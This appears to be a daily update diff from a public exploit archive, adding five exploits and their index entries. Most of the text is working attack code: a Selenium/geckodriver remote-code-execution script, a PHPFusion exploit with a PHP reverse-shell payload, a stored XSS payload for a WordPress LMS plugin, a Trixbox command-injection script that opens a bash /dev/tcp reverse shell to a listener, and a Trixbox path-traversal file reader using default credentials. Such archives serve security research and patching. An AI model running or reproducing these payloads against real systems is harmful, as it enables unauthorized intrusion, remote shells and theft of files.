DB: 2021-05-29

5 changes to exploits/shellcodes

PHPFusion 9.03.50 - Remote Code Execution
WordPress Plugin LifterLMS 4.21.0 - Stored Cross-Site Scripting (XSS)
Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated)
Trixbox 2.8.0.4 - 'lang' Path Traversal
Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver)

exploits/linux/webapps/49915.rb

@@ -0,0 +1,79 @@
+# Exploit Title: Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver)
+# Date: 2021-05-27
+# Exploit Author: Jon Stratton
+# Vendor Homepage: https://www.selenium.dev/
+# Software Link: https://selenium-release.storage.googleapis.com/3.141/selenium-server-standalone-3.141.59.jar
+# Version: 3.141.59
+# Tested on: Selenium Server 3.141.59, webdriver, geckodriver 
+#
+# https://github.com/JonStratton/selenium-node-takeover-kit/blob/master/examples/selenium_node_rce.rb
+#
+# When Selenium runs, it creates a custom profile (in /tmp/ for Linux) on the Node. This profile then gets overwritten by a possible overlay that is sent in a base64 encoded zip file when a Selenium session is started.
+#
+# One of the config file can be used to set a custom handler (which do things like, for instance, associates “mailto:blah@blah.com” to your email client). In this example, a new handler is created for “application/sh” that will execute the argument with “/bin/sh”
+#
+# Side notes, this profile doesn't safely unzip. So this can be used to write files to the file-system.
+#
+# The Payload is encoded and embedded as inline data associated with the "application/sh" mime type.
+
+#!/usr/bin/env ruby
+
+require 'optparse'
+require 'net/http'
+require 'json'
+require 'uri'
+require 'zip'
+require 'base64'
+
+options = {}
+OptionParser.new do |opts|
+  opts.banner = 'Usage: example.rb [options]'
+  opts.on('-hURL', '--hubURL', 'Selenium Hub URL') do |h|
+    options[:hub] = h
+  end
+  opts.on('--help', 'Prints this help') do
+    puts opts
+    exit
+  end
+end.parse!
+
+hub_url = options[:hub]
+
+payload = 'rm -rf $0
+echo success > /tmp/selenium_node_rce.txt'
+
+# Build profile zip file.
+stringio = Zip::OutputStream::write_buffer do |io|
+  # Create a handler for shell scripts
+  io.put_next_entry("handlers.json")
+  io.write('{"defaultHandlersVersion":{"en-US":4},"mimeTypes":{"application/sh":{"action":2,"handlers":[{"name":"sh","path":"/bin/sh"}]}}}')
+end
+stringio.rewind
+encoded_profile = Base64.strict_encode64(stringio.sysread)
+
+# Create session with our new profile
+newSession = {:desiredCapabilities => {:browserName => "firefox", :firefox_profile => encoded_profile}}
+
+uri = URI.parse(hub_url)
+http = Net::HTTP.new(uri.host, uri.port)
+
+# Start session with encoded_profile and save session id for cleanup.
+uri = URI.parse("%s/session" % [hub_url])
+request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json')
+request.body = JSON.generate(newSession)
+response = http.request(request)
+sessionId = JSON.parse(response.body)["value"]["sessionId"]
+
+# URL. 
+data_url = "data:application/sh;charset=utf-16le;base64,%s" % [Base64.encode64(payload)]
+uri = URI.parse("%s/session/%s/url" % [hub_url, sessionId])
+request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json')
+request.body = JSON.generate(:url => data_url)
+response = http.request(request)
+
+# End session(not working)
+uri = URI.parse("%s/session/%s" % [hub_url, sessionId])
+request = Net::HTTP::Delete.new(uri.request_uri)
+http.request(request)
+
+exit

exploits/php/webapps/49911.py

@@ -0,0 +1,50 @@
+# Exploit Title: PHPFusion 9.03.50 - Remote Code Execution
+# Date: 20/05/2021
+# Exploit Author: g0ldm45k
+# Vendor Homepage: https://www.php-fusion.co.uk/home.php
+# Software Link: https://www.php-fusion.co.uk/infusions/downloads/downloads.php?cat_id=30&download_id=606
+# Version: 9.03.50
+# Tested on: Docker + Debian GNU/Linux 8 (jessie)
+# CVE : CVE-2020-24949
+# Found by: ThienNV
+
+import requests
+import base64
+import argparse
+
+
+PAYLOAD = "php -r '$sock=fsockopen(\"127.0.0.1\",4444);exec(\"/bin/sh -i <&4 >&4 2>&4\");'  " # !!spaces are important in order to avoid ==!!
+REQUEST_PAYLOAD = "/infusions/downloads/downloads.php?cat_id=$\{{system(base64_decode({})).exit\}}"
+
+
+parser = argparse.ArgumentParser(description='Send a payload to a Fusion 9.03.50 server with "Allow PHP Execution" enabled.')
+parser.add_argument('target', type=str, help='Turn the Allow PHP Execution verification step on or off.')
+parser.add_argument("-v", "--no-verify", action="store_false")
+
+args = parser.parse_args()
+
+if args.target.startswith("http://") or args.target.startswith("https://"):
+    target = args.target
+else:
+    print("[!] Target should start with either http:// or https://")
+    exit()
+
+# verify payload
+PAYLOAD_B64 = base64.b64encode(PAYLOAD.encode('ascii')).decode("ascii")
+if '+' in PAYLOAD_B64 or '=' in PAYLOAD_B64:
+    print("[!] Invalid payload, make sure it does not contain a + or a =!")
+    exit()
+
+# verify vulnerable host
+if args.no_verify:
+    page_data = requests.get(target + "/infusions/downloads/downloads.php?cat_id=${system(ls)}")
+    if "infusion_db.php" not in page_data.text:
+        print("[!] Can't seem to find infusion_db.php. QUITTING!")
+        print("[!] If this validation is wrong just use the --no-verify flag.")
+        exit()
+
+
+# send request
+requests.get(target + REQUEST_PAYLOAD.format(PAYLOAD_B64))
+
+print("[*] Requests send, did you get what you wanted?")

exploits/php/webapps/49912.txt

@@ -0,0 +1,26 @@
+# Exploit Title: WordPress Plugin LifterLMS 4.21.0 - Stored Cross-Site Scripting (XSS) 
+# Date: 2021-05-10
+# Exploit Author: Captain_hook
+# Vendor Homepage: https://lifterlms.com/
+# Software Link: https://github.com/gocodebox/lifterlms/releases/tag/4.21.0
+# Version: LifterLMS < 4.21.1
+# Tested on: ANY
+# CVE : CVE-2021-24308
+
+#Summary:
+
+The 'State' field of the Edit profile page of the LMS by LifterLMS – Online Course, Membership & Learning Management System Plugin for WordPress plugin before 4.21.1 is not properly sanitised when output in the About section of the profile page, leading to a stored Cross-Site Scripting issue. This could allow low privilege users (such as students) to elevate their privilege via an XSS attack when an admin will view their profile.
+
+#Proof_of_Concept:
+
+1- As a Lowest Privilege user go to the edit account page of the LMS
+(e.g https://example.com/my-courses/edit-account/)
+
+2- Put Your XSS payload in State parameter and save your edits, such
+as "><script>alert(/XSS/)</script>
+
+3- The XSS will be stored and triggered in the about section of the profile: (e.g  https://example.com/directory/[user_name]/) (Note): The XSS will also be triggered in the admin dashboard when viewing the user details, for example https://example.com/wp-admin/admin.php?page=llms-reporting&tab=students&stab=information&student_id=2
+
+Refernces:
+
+https://github.com/gocodebox/lifterlms/releases/tag/4.21.0

exploits/php/webapps/49913.py

@@ -0,0 +1,72 @@
+# Exploit Title: Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated)
+# Date: 27.05.2021
+# Exploit Author: Ron Jost (Hacker5preme)
+# Credits to: https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
+# Credits to: Sachin Wagh
+# Vendor Homepage: https://sourceforge.net/projects/asteriskathome/
+# Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download
+# Version: 2.8.0.4
+# Tested on: Xubuntu 20.04
+# CVE: CVE-2017-14535
+
+'''
+Description:
+trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php
+'''
+
+
+
+'''
+Import required modules:
+'''
+import requests
+import sys
+import time
+
+
+'''
+User-input:
+'''
+target_ip = sys.argv[1]
+target_port = sys.argv[2]
+listen_ip = sys.argv[3]
+listen_port = sys.argv[4]
+
+
+'''
+Construct malicious request:
+'''
+# Construct header:
+header = {
+    'Host': target_ip,
+    'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
+    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
+    'Accept-Encoding': 'gzip, deflate',
+    'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=',
+    'Connection': 'close',
+    'Upgrade-Insecure-Requests': '1',
+    'Cache-Control': 'max-age=0'
+}
+
+# Construct malicious link:
+link_p1 = 'http://' + target_ip + ':' + target_port + '/maint/modules/home/index.php?lang=english|bash%20-i%20%3E%26%20'
+link_p2 = '%2Fdev%2Ftcp%2F' + listen_ip + '%2F' + listen_port + '%200%3E%261||x'
+link = link_p1 + link_p2
+
+
+'''
+Finish: EXPLOIT!!!
+'''
+print('')
+print('')
+print('Please start the following command in a seperate terminal: nc -lnvp ' + listen_port)
+print('')
+time.sleep(2)
+Ready = input("If you're done and want to start the exploit please input EXPLOIT: ")
+if Ready == 'EXPLOIT':
+    print('')
+    print('Exploit sent, check your Netcat instance :)')
+    x = requests.post(link, headers=header)
+else:
+    print('TRY AGAIN')

exploits/php/webapps/49914.py

@@ -0,0 +1,75 @@
+# Exploit Title: Trixbox 2.8.0.4 - 'lang' Path Traversal
+# Date: 27.05.2021
+# Exploit Author: Ron Jost (Hacker5preme)
+# Credits to: https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
+# Credits to: Sachin Wagh
+# Vendor Homepage: https://sourceforge.net/projects/asteriskathome/
+# Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download
+# Version: 2.8.0.4
+# Tested on: Xubuntu 20.04
+# CVE: CVE-2017-14537
+
+'''
+Description:
+trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the
+lang parameter to /maint/modules/home/index.php.
+'''
+
+
+'''
+Import required modules:
+'''
+import requests
+import sys
+import urllib.parse
+
+
+'''
+User-Input:
+'''
+target_ip = sys.argv[1]
+target_port = sys.argv[2]
+
+
+'''
+Construct malicious request:
+'''
+# Constructing header:
+header = {
+    'Host': target_ip,
+    'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
+    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
+    'Accept-Encoding': 'gzip, deflate',
+    'Connection': 'keep-alive',
+    'Cookie': 'template=classic; lng=en; lng=en',
+    'Upgrade-Insecure-Requests': '1',
+    'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=',
+}
+
+# Constructing malicious link (payload):
+base_link = 'http://' + target_ip + ':' + target_port
+base_link_addon_1 = '/maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
+base_link_addon_3 = '%00english'
+print('')
+base_link_addon_2 = input('Input the filepath or input EXIT: ')
+
+
+
+'''
+EXPLOIT:
+'''
+while base_link_addon_2 != 'EXIT':
+    base_link_addon_2_coded = urllib.parse.quote(base_link_addon_2, safe='')
+    exploit_link = base_link + base_link_addon_1 + base_link_addon_2_coded + base_link_addon_3
+    print('')
+    exploit = requests.post(exploit_link, headers=header)
+    print('Contents of ' + base_link_addon_2 + ':')
+    for data in exploit.iter_lines():
+        data = data.decode('utf-8')
+        if data != '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">':
+            print(data)
+        else:
+            break
+    print('')
+    base_link_addon_2 = input('Input the filepath or input EXIT: ')

files_exploits.csv

@@ -44074,3 +44074,8 @@ id,file,description,date,author,type,platform,port
 49907,exploits/multiple/webapps/49907.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated) (3)",2021-05-26,"Ron Jost",webapps,multiple,
 49909,exploits/php/webapps/49909.py,"Pluck CMS 4.7.13 - File Upload Remote Code Execution (Authenticated)",2021-05-26,"Ron Jost",webapps,php,
 49910,exploits/multiple/webapps/49910.py,"Postbird 0.8.4 - Javascript Injection",2021-05-27,"Debshubra Chakraborty",webapps,multiple,
+49911,exploits/php/webapps/49911.py,"PHPFusion 9.03.50 - Remote Code Execution",2021-05-28,g0ldm45k,webapps,php,
+49912,exploits/php/webapps/49912.txt,"WordPress Plugin LifterLMS 4.21.0 - Stored Cross-Site Scripting (XSS)",2021-05-28,Captain_hook,webapps,php,
+49913,exploits/php/webapps/49913.py,"Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated)",2021-05-28,"Ron Jost",webapps,php,
+49914,exploits/php/webapps/49914.py,"Trixbox 2.8.0.4 - 'lang' Path Traversal",2021-05-28,"Ron Jost",webapps,php,
+49915,exploits/linux/webapps/49915.rb,"Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver)",2021-05-28,"Jon Stratton",webapps,linux,